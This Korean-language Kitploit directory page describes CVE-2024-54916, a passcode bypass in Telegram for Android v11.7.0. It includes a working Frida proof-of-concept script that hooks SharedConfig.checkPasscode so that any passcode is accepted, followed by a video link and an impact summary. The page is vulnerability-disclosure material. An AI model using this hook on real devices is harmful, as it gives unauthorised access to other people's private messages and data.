Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-54916 — SharedConfig.checkPasscode를 후킹하여 항상 true를 반환하도록 함으로써 Telegram Android의 인증 우회를 시연하는 Frida 기반 개념 증명으로, 무단 액세스를 가능하게 합니다. | Kitploit
도구/GitHubGitHub/sahalll/cve-2024-54916
Android SecurityDynamic Analysis (Sandboxing)Vulnerability AnalysisExploitationMobile SecurityBinary AnalysisAuthentication
GitHubsahalll/cve-2024-54916

CVE-2024-54916

SharedConfig.checkPasscode를 후킹하여 항상 true를 반환하도록 함으로써 Telegram Android의 인증 우회를 시연하는 Frida 기반 개념 증명으로, 무단 액세스를 가능하게 합니다.

저장소 보기
161년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-54916: Telegram APK 인증 우회

Telegram Android APK v.11.7.0의 SharedConfig 클래스에서 발생한 문제로, 물리적으로 근접한 공격자가 checkPasscode 메서드의 반환 값을 조작하여 인증을 우회하고 권한을 상승시킬 수 있습니다.

취약점 유형

인증 우회

제품 공급업체

Telegram

영향을 받는 제품 코드 베이스

Telegram android apk v.11.7.0

영향을 받는 구성 요소

org.telegram.messenger.SharedConfig

악용

대상 클래스 및 메서드 식별:

  • 애플리케이션의 SharedConfig 클래스는 암호 확인 로직을 관리합니다.
  • 이 클래스의 checkPasscode 메서드는 입력된 암호의 유효성을 결정하는 역할을 합니다.

Frida를 사용하여 메서드 후킹

  • Frida 스크립트를 사용하여 SharedConfig 클래스의 checkPasscode 메서드를 후킹합니다. 메서드 구현이 항상 true를 반환하도록 변경되어 실제 암호 검증을 우회합니다.

실행

  • Frida 스크립트는 앱이 실행되는 동안(동적으로) 실행됩니다. 사용자가 입력한 모든 암호가 유효한 것으로 간주되어 무단 액세스를 허용합니다.

POC

Java.perform(function() {

// Locate the SharedConfig class in the target application

var PassCodeActivity = Java.use('org.telegram.messenger.SharedConfig');

// Hook the checkPasscode method to modify its behavior

PassCodeActivity.checkPasscode.implementation = function(passcode) {

// Bypass the actual passcode check by always returning true

return true;

};

});

동영상 PoC 링크:-

https://drive.google.com/file/d/1-lW1IQiCyj-8UXZOTedYPGPhQwfMLX4M/view?usp=sharing

영향:-

이 취약점은 클라이언트 측 인증 우회 문제입니다. 이는 민감한 데이터를 보호하거나 특정 앱 기능에 대한 접근을 제한하기 위해 암호 기능에 의존하는 사용자에게 영향을 미칩니다. 이 결함을 악용하여 물리적으로 근접한 공격자가 암호 확인 프로세스를 조작하고, 인증을 우회하며, 앱의 보호된 영역에 무단 액세스할 수 있습니다. 이는 민감한 사용자 데이터의 노출이나 애플리케이션 내 무단 작업으로 이어질 수 있습니다.

도구 다운로드